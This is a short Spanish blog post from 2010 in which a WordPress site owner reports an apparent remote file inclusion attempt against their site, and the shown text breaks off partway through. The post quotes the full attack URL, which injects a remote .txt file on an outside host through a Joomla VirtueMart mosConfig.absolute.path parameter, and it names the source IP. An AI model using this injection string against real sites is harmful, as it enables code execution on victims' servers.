El día 02-17-2010, a las  08:25 pm exactamente ésta web ha recibido un supuesto  intento de ataque (RFI?). Entre la gente que usamos WordPress, Joomla o cualquier otro portal dinámico con posibilidad a comentarios, aparecen de vez en cuando en nuestros paneles “comentarios” para aprobar aparentemente sin sentido, la mayoría de ellos son pruebas e intentos de inyección.  Por una parte éste intento de ataque es  gracioso pero insignificante, pero si que hay gente evaluando y desarrollando exploits de verdad  o inyecciones para versiones actuales.  Por otra parte nos contenta  que evaluen la seguridad de los servicios que usamos el público en general de cualquier manera posible, en mi caso (WordPress 2.9.1 + 000webhosting) pués así es como las empresas van mejorando sus softwares, productos y servicios en general.

La ip que  ha quedado Filtrada en nuestro sistema es:  (Para ello también existen plugins WordPress como visitors maps asi como para  Joomla y Drupal…)

78.110.50.121   (c19-w.ht-systems.ru)  Moscú

El intento de ataque ha sido este: (http://luctus.es/?p=298/components/com_virtuemart/*******_imgtag.php?mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt????) y se ha intentado realizar exactamente desde ésta variable:    http://luctus.es/?p=298/… Read the rest of this entry